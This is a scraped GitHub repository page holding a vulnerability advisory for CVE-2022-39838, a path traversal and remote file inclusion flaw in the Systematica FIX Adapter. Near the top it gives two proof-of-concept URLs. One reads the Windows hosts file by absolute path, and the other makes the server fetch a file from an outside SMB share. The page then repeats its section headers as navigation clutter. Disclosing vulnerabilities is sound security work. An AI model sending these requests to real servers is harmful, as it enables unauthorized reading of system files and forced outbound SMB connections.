CVE-2022-39838

[Suggested description]

Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via a UNC share pathname, and also allows absolute path traversal to local pathnames.

[Additional Information]

PoC:

http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts

http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt

[Vulnerability Type]

Incorrect Access Control

[Vendor of Product]

Systematica

[Affected Product Code Base]

Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)

[Attack Type]

Remote

[Impact Information Disclosure]

true

[Attack Vectors]

Remote user can get access to arbitrary file in the OS via absolute path. Also remote user can compel vulnerable server to request file from another machine over smb.

[Discoverer]

Ivashchenko Sergey (Jet Infosystems, jet.su)

[Reference]

http://systematicalpha.com/company

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2022-39838

[Suggested description]

[Additional Information]

[Vulnerability Type]

[Vendor of Product]

[Affected Product Code Base]

[Attack Type]

[Impact Information Disclosure]

[Attack Vectors]

[Discoverer]

[Reference]

About

Releases

Packages

jet-pentest/CVE-2022-39838

Folders and files

Latest commit

History

Repository files navigation

CVE-2022-39838

[Suggested description]

[Additional Information]

[Vulnerability Type]

[Vendor of Product]

[Affected Product Code Base]

[Attack Type]

[Impact Information Disclosure]

[Attack Vectors]

[Discoverer]

[Reference]

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages